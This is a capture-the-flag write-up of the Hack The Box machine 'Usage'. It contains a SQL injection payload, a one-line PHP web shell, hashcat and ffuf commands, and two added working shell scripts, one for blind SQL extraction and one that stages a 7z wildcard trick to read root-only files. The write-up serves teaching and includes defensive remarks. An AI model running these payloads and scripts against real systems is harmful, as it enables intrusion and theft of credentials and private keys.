Hello everyone, in today's blog post we will be doing Usage, a Linux machine from Hack The Box. Thank you for reading and enjoy!

1) Kicking it off with the Nmap scan as usual to see what we are dealing with:

Nothing too fancy here: only two ports are open, SSH and HTTP on port 80. I added usage.htb to /etc/hosts right away, so let's get started with the enumeration!

2) Port 80 offers a simple website that lets us register and log in, but there is nothing of interest after logging in, as it is a static page. There is also an administrator login, for which I don't have credentials at the moment (I tried some default creds, but they didn't work). The administrator portal lives on a separate subdomain, admin.usage.htb, which I found by fuzzing virtual host names with ffuf:

ffuf -w /usr/share/seclists/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.usage.htb" -u http://10.10.11.18

3) The website also lets us reset our password, and that endpoint is vulnerable to SQL injection! Supplying a single quote instead of an email address produces a 500 server error, which is a strong indicator of SQL injection: our input is concatenated straight into the SQL query instead of being passed through a prepared statement, so we can imagine the back-end query looking roughly like this:

SELECT * FROM users WHERE email='<OUR_INPUT>'

That is why our input is treated as part of the SQL command rather than as a plain string, which is exactly what a prepared statement would guarantee. Let's proceed further with the exploration:

Okay, now let's see what type of SQL injection we have. I confirmed it is a boolean-based blind injection; here is the payload I used:

' OR '1'='1-- -

(MySQL only treats -- as a comment when it is followed by whitespace, which is why the payload ends in "-- -"; I had already identified the back end as MySQL.)

Cool. Since doing this by hand is tedious, I used sqlmap to dump the database and found a couple of credentials; the administrator's were of course the most interesting, since we want access to that admin portal:
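To show what sqlmap is actually doing behind the scenes when it dumps a value over a boolean-based blind injection, here is an added example that is not part of the original write-up. It assumes the back end runs the string-concatenated query from above in the form SELECT count(*) FROM users WHERE email='<input>' and answers differently when a row matches, and it assumes the table and column names users(email, password). The HTTP round trip to the password-reset form is replaced by a local oracle against a throwaway SQLite database (a stand-in for MySQL; substr() and "--" comments behave the same for this purpose), so the sqlite3 command-line tool is required to run it.

```shell
#!/bin/sh
# Added example, not from the original write-up: boolean-based blind extraction
# of the admin's password hash, one character at a time, against a constructed
# SQLite database that stands in for the MySQL back end. Assumed schema:
# users(email, password). Run with "sh blind_sqli.sh demo".

DB=$(mktemp)

# Constructed sample database with a known target value to recover.
setup_db() {
    sqlite3 "$DB" <<'EOF'
CREATE TABLE users(email TEXT, password TEXT);
INSERT INTO users VALUES ('admin@usage.htb', '$2y$10$Ab./');
INSERT INTO users VALUES ('raj@usage.htb',   '$2y$10$Zz9x');
EOF
}

# The vulnerable statement: input is concatenated, never parameterised.
vulnerable_query() {
    printf "SELECT count(*) FROM users WHERE email='%s'" "$1"
}

# Oracle: exit 0 when the (injected) WHERE clause matched at least one row,
# i.e. the "account found" branch the reset form reveals; exit 1 otherwise,
# including on a SQL syntax error (the web app's 500).
oracle() {
    n=$(sqlite3 "$DB" "$(vulnerable_query "$1")" 2>/dev/null) || return 1
    [ "${n:-0}" -gt 0 ]
}

# Payload answering "is character $1 of admin's password hash equal to $2?".
# The trailing "-- -" comments out the closing quote the application appends.
blind_payload() {
    printf "x' OR substr((SELECT password FROM users WHERE email='admin@usage.htb'),%d,1)='%s'-- -" "$1" "$2"
}

# Recover the hash position by position by trying every charset character;
# stop at the first position where nothing matches (end of the string).
extract_admin_hash() {
    charset='$./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    result=''
    pos=1
    while :; do
        found=''
        i=1
        while [ "$i" -le "${#charset}" ]; do
            c=$(printf '%s' "$charset" | cut -c "$i")
            if oracle "$(blind_payload "$pos" "$c")"; then
                found=$c
                break
            fi
            i=$((i + 1))
        done
        [ -n "$found" ] || break
        result="$result$found"
        pos=$((pos + 1))
    done
    printf '%s' "$result"
}

if [ "${1:-}" = "demo" ]; then
    setup_db
    # A lone quote leaves the statement unbalanced: this is the query behind the 500.
    echo "Query built from a lone quote: $(vulnerable_query "'")"
    echo "Recovered hash: $(extract_admin_hash)"
    rm -f "$DB"
fi
```

Each oracle call is one "email found / not found" answer, which is why a blind dump needs hundreds of requests and why sqlmap is the practical choice; the fix on the application side is to bind the email as a parameter instead of building the string in vulnerable_query.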

I used hashcat to crack the administrator's hash (sorry, I lost my screenshots of the sqlmap output and the hashes; if someone is confused about how I used sqlmap in this instance, please feel free to leave a comment below or reach out to me on Discord):

hashcat -m 3200 hash.txt rockyou.txt

(-m 3200 is hashcat's bcrypt mode.)

4) Great, now we have access to the admin console, where I observed several interesting things:

4.1) The first thing I wanted to check was the operational logs, and there I found the hash of the administrator's password, which I wasn't able to crack:

4.2) Next, the file upload feature when creating a new user caught my attention, but whenever I tried to create a new user I got a 500 error, so we can't test for file upload vulnerabilities that way.

4.3) After some more enumeration I went back to the operational logs, since there wasn't much else to do. In the logs I noticed many GET requests to an endpoint I hadn't seen during my initial enumeration: admin/auth/settings

4.4) I requested it right away, and through this endpoint I can edit the administrator's profile, including the profile picture (a file upload feature is always interesting)!

4.5) I decided to give it a shot and try uploading a simple PHP web shell right away:

<?php system($_GET['cmd']); ?>

And that worked out, awesome!

4.6) To get a reverse shell I used the PentestMonkey PHP reverse shell; as soon as I uploaded it and submitted the changes via the /settings endpoint, I got a shell on my netcat listener:

5) This gave us user.txt and an initial foothold, cool!

6) The important lesson here is to always check the current user's home directory for juicy information, because in the hidden .monitrc file we found the password of another user, xander:

7) With it we can get a shell as xander via SSH, cool! The first check I like to make whenever I get a shell is sudo -l, to see whether I can run any commands via sudo, and as xander I can!

8) Running the usage_management script via sudo, only the first option works, the backup. What caught my eye is its use of 7z, which can be abused for privilege escalation:

According to GTFOBins, this is the command we would have to run, but we don't have that luxury here, because as the next screenshot shows, the script simply backs up /var/www/html:

I always like to use the strings command to look more closely at what is happening inside the script:

Here we can see that 7z is indeed used to back up /var/www/html into /var/backups/project.zip, and I can also see the full 7z command being used, ending in "-- *". Let's do a Google search for it!

And I found just what I was looking for on HackTricks (https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks): how this wildcard lets us read sensitive files:

8.1) Okay, the path is now clear; I reproduced the same steps on the target machine:

8.2) Then, when we ran the script as root again, we got the contents of root.txt!:

8.3) We can use the same approach to read root's private SSH key and get a shell as root. GG!
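As an added example that is not part of the original write-up, the following script stages the 7z "@listfile" trick from the HackTricks page in a scratch directory, so the effect can be observed locally before doing it on a target. It assumes the privileged backup command is 7za a /var/backups/project.zip -tzip -snl -mmt -- * run from inside the directory being backed up; the write-up only shows that the command ends in "-- *", the -tzip/-snl/-mmt switches are modelled on the HackTricks example, and only the trailing "*" matters for the trick. On the target, the two planted files go into /var/www/html (the directory being backed up) and the symlink points at /root/root.txt or root's SSH private key (path assumed to be /root/.ssh/id_rsa); here they point at a constructed file the current user can read, since the script is not running as root.

```shell
#!/bin/sh
# Added example, not from the original write-up: stage the 7z listfile trick.
#
# Why it works: the shell expands "*" to every filename in the directory, so a
# file named "@root.txt" reaches 7z as the argument "@root.txt", which 7z reads
# as "take the list of files to add from root.txt". If root.txt is a symlink to
# a file only root can read, the privileged 7z opens it, treats every line as a
# filename, cannot find those "files" and echoes the lines back in its
# "WARNING: No more files" messages. Run with "sh listfile_trick.sh demo".

# stage_listfile_trick DIR TARGET: plant @root.txt and the root.txt symlink in DIR.
stage_listfile_trick() {
    mkdir -p "$1"
    : > "$1/@root.txt"            # empty file whose name starts with '@'
    ln -sf "$2" "$1/root.txt"     # symlink that 7z will open as the list file
}

# run_backup DIR ARCHIVE: mimic the backup step (assumed switches, see above)
# and return 7z's combined output. 7z exits 1 on warnings, so that is tolerated.
run_backup() {
    bin=$(command -v 7za || command -v 7z || command -v 7zz) || {
        echo "no 7z binary installed" >&2
        return 2
    }
    ( cd "$1" && "$bin" a "$2" -tzip -snl -mmt -- * 2>&1 ) || true
}

# leaked_lines OUTPUT: keep only the "filenames" 7z complained about, which are
# the lines of the symlinked file (format as printed by p7zip 16.02: the warning
# line followed by the offending name on the next line).
leaked_lines() {
    printf '%s\n' "$1" | awk '/No more files/ { getline; print }'
}

if [ "${1:-}" = "demo" ]; then
    work=$(mktemp -d)
    # Constructed stand-in for /root/root.txt.
    printf 'SECRET_FLAG_constructed_sample\n' > "$work/secret"
    stage_listfile_trick "$work/www" "$work/secret"
    out=$(run_backup "$work/www" "$work/project.zip")
    echo "--- raw 7z output ---"
    printf '%s\n' "$out"
    echo "--- leaked lines ---"
    leaked_lines "$out"
    rm -rf "$work"
fi
```

The defensive takeaway is the mirror image: a privileged job must never run an archiver with a bare "*" over a directory that a less-privileged user can write to; list the paths explicitly, or at least refuse names beginning with "@" or "-" and do not follow symlinks.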

Lessons Learned

1) The first lesson I learned here is to always test every input field present in a web app, as any of them can be vulnerable; in this case, to SQLi!

2) The next lesson is to keep enumerating: a lot of enumeration of the admin portal led me to discover the settings endpoint, which allowed me to upload a reverse shell!

3) The third lesson is definitely to pay attention to small details, especially in the current user's home directory, as passwords can be hidden in any file there!

4) Finally, the last one is the importance of deeply enumerating the scripts we can run and what exactly they do when we run them, especially if we can do so as root. Here I discovered the directory being backed up as well as the exact 7z command being used, which led to the privilege escalation.
